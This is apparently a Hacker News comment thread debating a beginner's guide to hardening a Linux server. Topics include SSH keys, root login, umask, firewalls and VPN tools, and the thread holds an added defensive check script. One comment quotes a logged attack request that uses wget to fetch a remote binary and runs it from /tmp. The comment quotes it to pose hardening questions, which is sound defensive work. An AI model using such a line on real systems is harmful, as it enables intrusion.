The Reluctant Sysadmin's Guide to Securing a Linux Server

331 points by WallyFunk, almost 2 years ago

31 comments

gazby, almost 2 years ago
There's a reason guides like this are a dime a dozen - there is no way to generalize server configuration this broadly.

But as long as we're doing it anyway - the only thing that locking the root account gets you is assurance that if you ever bork the user you created in this guide (or sudo functionality as a whole) you'll have no way to recover without booting into another environment.

Perhaps one ought not take sysadmin advice from a blog post with a first sentence that reads "I’m not a sysadmin, and I don’t want to be".
teddyh, almost 2 years ago
I would instead suggest the official guide; the Securing Debian Manual <https://www.debian.org/doc/manuals/securing-debian-manual/>
jeffbee, almost 2 years ago
It's weird to begin such an exercise without stating what the point of "the server" is supposed to be. Is it a ... web server? Interactive unix logins for developers? Mail relay? What does it do? This is the key point of the analysis because "securing" a server consists in making it incapable of doing anything not in the set of things it is meant to do. Notably, starting from this side of the problem can lead you away from "standard machine image". Starting with a kitchen-sink Linux distro like Ubuntu is not the road to hardness.
ufmace, almost 2 years ago
I actually disagree with most of this. I think that, for servers, it's best to stay as close to the "cattle, not pets" model as reasonably possible. Servers should be set up and maintained with automated tooling and rarely connected to manually, preferably only to debug issues. Most of the things in here are gimmicky one-offs that don't meaningfully increase security.

Don't bother setting up a user account, use a public key authorized SSH session as root to do everything. Setting up UFW to block everything but what you should be serving is good. I don't see much point in things like Wireguard or this umask thing.
politelemon, almost 2 years ago
> If you’re on Windows, PuTTYgen should work

If you're on Windows you can `wsl --install` and work with Linux (eg Ubuntu 2204).

You can also install Git Bash which comes with ssh and ssh-keygen.

Either way, same instructions.
gus_, almost 2 years ago
> GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.231/jaws;sh+/tmp/jaws

in the case of a successful attack, some questions to ask could be:

- why did they manage to use wget?

- why {apache,nginx,postfix,exim,sendmail,...} is allowed to use wget, or curl, or nc or bash (or ...)?

- why is wget, curl, nc, telnet, .. installed on the server? can they be uninstalled? with (!!) if it's a container.

- why did they manage to execute files from /tmp, or /var/tmp, or /dev/shm? do these directories need write access for "others" or can they be mounted with "noexec"?

- ufw/iptables/nftables won't stop local binaries from opening outbound connections, how would you stop outbound connections by binary, path, etc?

- if they managed to wipe the logs, how could you have known all the commands they executed? could auditd+grafana (just an example) have helped here by sending logs to a remote server?
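Two of the questions in that comment (are the scratch directories mounted noexec, and which download tools are even installed) can be answered with a quick check script. This is an added example, not part of the comment or the linked article; it assumes the usual six-column /proc/mounts format and uses a constructed sample mount table for the demonstration run.

```shell
#!/bin/sh
# Added example (not from the comment or the linked article): two of the
# post-incident questions above turned into checks a defender can run.
# Assumes /proc/mounts in its usual six-column format.

# Constructed sample mount table, labelled as such; /var/tmp is the only
# scratch directory mounted noexec here.
SAMPLE_MOUNTS='/dev/vda1 / ext4 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev 0 0
tmpfs /var/tmp tmpfs rw,nosuid,nodev,noexec 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0'

# Report the world-writable scratch directories that are not mounted noexec
# (one finding per line). A directory with no mount entry of its own inherits
# the exec permission of the filesystem above it, so it is reported as well.
missing_noexec() {
    mounts="$1"
    for dir in /tmp /var/tmp /dev/shm; do
        opts=$(printf '%s\n' "$mounts" | awk -v d="$dir" '$2 == d {print $4}')
        if [ -z "$opts" ]; then
            printf '%s: not a separate mount\n' "$dir"
            continue
        fi
        case ",$opts," in
            *,noexec,*) ;;  # good: a file dropped here cannot be run directly
            *) printf '%s: missing noexec\n' "$dir" ;;
        esac
    done
}

# List which of the download/dial-out tools named in the comment are
# reachable on PATH; an empty list is what you want on a single-purpose server.
installed_tools() {
    for tool in wget curl nc telnet; do
        command -v "$tool" >/dev/null 2>&1 && printf '%s\n' "$tool"
    done
    return 0
}

# Live run against this host (uses the real mount table, not the sample).
check_host() {
    missing_noexec "$(cat /proc/mounts)"
    installed_tools
}

missing_noexec "$SAMPLE_MOUNTS"
installed_tools
```

Run `check_host` instead of the two sample calls to audit the machine you are on; a finding of "missing noexec" is the condition that let the quoted `sh /tmp/jaws` step work.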
teekert, almost 2 years ago
I’m a biologist and also a reluctant sysadmin. I’m happy to see I do roughly the same [0] except that I use an ed25519 ssh key and switched to Tailscale (it’s just too easy). I only open “unsafe” ports on the tailnet.

I did just install my first NixOS system so I’m indeed heading towards full automation.

[0] https://blog.hmrt.nl/posts/first_steps_arch_box/
JohnCClarke, almost 2 years ago
The first rule of sysadmin: Have a regular schedule for testing your offsite backups of all your systems.

After that, as others have noted, create and review a threat model and use that to guide your hardening based on official guides:

https://www.debian.org/doc/manuals/securing-debian-manual/

and here's a readable introduction to the NIST STIGs:

https://cybergladius.com/nist-server-hardening-best-practices/
thr0waway001, almost 2 years ago
Reluctant sysadmin: story of my life.

Over the last 3 years I have gone from being a timid junior web dev to reluctantly and hastily having to be the guy managing the Linux web servers and keeping the operation running and being hardened along the way.

On the one hand, the huge salary increase has been nice but on the other hand I am constantly thinking one day I'm gonna fuck it all up. I feel like I'm not doing this job any justice and that I'm way out of my element all the time.

I try to get better by reading blog posts like this and documentation and asking for advice but I just feel like an impostor all the time.

But employers are happy with the results and I guess that makes it tolerable.

So thanks for these types of guides!
pid-1, almost 2 years ago
Sysadmin isn't a profession you choose, it's something that happens to your life.
msravi, almost 2 years ago
Also configure fail2ban and enable it for ssh.

https://www.digitalocean.com/community/tutorials/how-to-protect-ssh-with-fail2ban-on-ubuntu-20-04
tristor, almost 2 years ago
I have a few things I disagree with in here and I haven't even gotten all the way through. Generally, most of this is unnecessary, some of it is even ill-advised. The best thing you can do is enable automated updates, and rely on your cloud provider's console for accessing the server and disabling all remote access otherwise. If you do this, you remove a significant amount of vectors of attack. Within AWS there are very good security controls you can put into place, on more generic VPS providers, at minimum you should start by running a firewall that only allows incoming and outgoing traffic on specified ports, and logging in only via key-based auth + 2FA (you can use Google Auth, Yubikey, or others to do this via PAM modules) if you must use SSH. Most of the security issues I've encountered in my career have been in the application, and then are used to provide a pathway to do further privilege escalation. If you work to sandbox your applications, such as using hardened minimal containers w/ appropriate namespacing & sVirt, this mitigates most concerns here.

It's been trivially easy to prevent bots spamming basic SSH and HTTP attacks to every IPv4 address for a very long time.
DyslexicAtheist, almost 2 years ago
securing from what? this thing is pointless mid-90s advice without a threat-model.
Sparkyte, almost 2 years ago
Meh, just do it like me: get a hardened image and container. Deploy stuff as a gold image without elevated permissions and/or container. Then just make sure everything is behind a proxy or intelligent load balancer that restricts any crazy input.

DON'T OVERCOMPLICATE WORK

Overcomplicating work means slower response times to solving problems.
Terretta, almost 2 years ago
If you are training an HN parody LLM, this is a perfect discussion to add to your training set, featuring all the canonical archetypes—including my comment among them.

The headline and post read like top shelf parody too, as if synthetically generated to summon we archetypes.
mmsc, almost 2 years ago
I like the changing of the default umask, although it probably shouldn't be 077.

Is acl needed over, say, chown?
tphummel, almost 2 years ago
This was an informative article with an opinionated take. Don’t update the original based on feedback. It is your article on your blog. You do you.
user3939382, almost 2 years ago
I’d learn to run OpenSCAP with CIS and the NIST CSF to get an idea of secure operations. The former can detect and remediate a lot of the issues these types of guides are discussing.

But really the idea of being successful at anything while also having no knowledge of it is kind of a farcical contradiction.

It’s like saying, look, I just want to build a rocket engine. Tell me how without all the physics mumbo jumbo.
lofaszvanitt, almost 2 years ago
Everyone is parroting the same thing over and over again, but no one is going into the whys. Why do this, what's the benefit, how will it thwart this or that type of attack. New books on the subject tend to collect these guides, distill them a bit, and parrot it all over again.
acumenical, almost 2 years ago
This notion of security is stale. Real security is far more complex than this, requiring automated provisioning and logging. This is more suitable for a VPS or a personal VM than anything professional. Also installing acl just to use setfacl bothered me.
r3n, almost 2 years ago
Is there a guide to teach these reluctant sysadmins how to evaluate, plan, and choose between all these different methods?

For me, I find the hardest part of securing systems is usually to decide what is good enough for the current situation.
lazyant, almost 2 years ago
> We want a umask of 077,

No we don't. This creates problems with many packages. There's a reason for defaults and a reason not to follow cargo-culting security "recipes".
kbar13, almost 2 years ago
Trying my best to understand the target audience for this blog post. It feels like most of these things fall somewhere in between "a sysadmin should know this" and "this might be new to a dev without much ops experience". And then, my first thought is, well if you're focused on getting software out the door your best bet is not to touch any of this stuff and deploy on a platform where configuring the Linux distro is not your responsibility, i.e. k8s or AWS ECS.
nunez, almost 2 years ago
WireGuard is fine, but since it's only UDP, it doesn't work well if you're connecting behind a restrictive firewall or from a network using CGNAT (many of them).

If you're a reluctant sysadmin that doesn't care, I'd recommend using Tailscale. It's wireguard without the drama, is extremely competent at piercing through almost any firewall [0], and has a great ACL system that lets you fine tune which accounts can access what.

It's also free (for now)!

[0] https://tailscale.com/blog/how-nat-traversal-works/
bawolff, almost 2 years ago
I don't get why a wireguard vpn to connect to ssh would be any better than just ssh directly (assuming reasonable ssh config)
_el, almost 2 years ago
It's definitely neat to know how these things work on a Linux server, but most of this advice doesn't make sense for an EC2 instance. You should be using security groups instead of UFW (indeed the article mentions this). You don't need to configure SSH access because SSM session manager exists, which also makes the WireGuard setup superfluous, too.
jesprenj, almost 2 years ago
> You should not log in directly as root.

Why not?
optimalsolver, almost 2 years ago
No Fail2ban?
badrabbit, almost 2 years ago
Run lynis and linpeas!!!

Also, set up auditd and rsyslog forwarding. Back up anything important.
andai, almost 2 years ago
Wouldn't it be easier to use OpenBSD?
g4zj, almost 2 years ago
No mention of SSH certificates?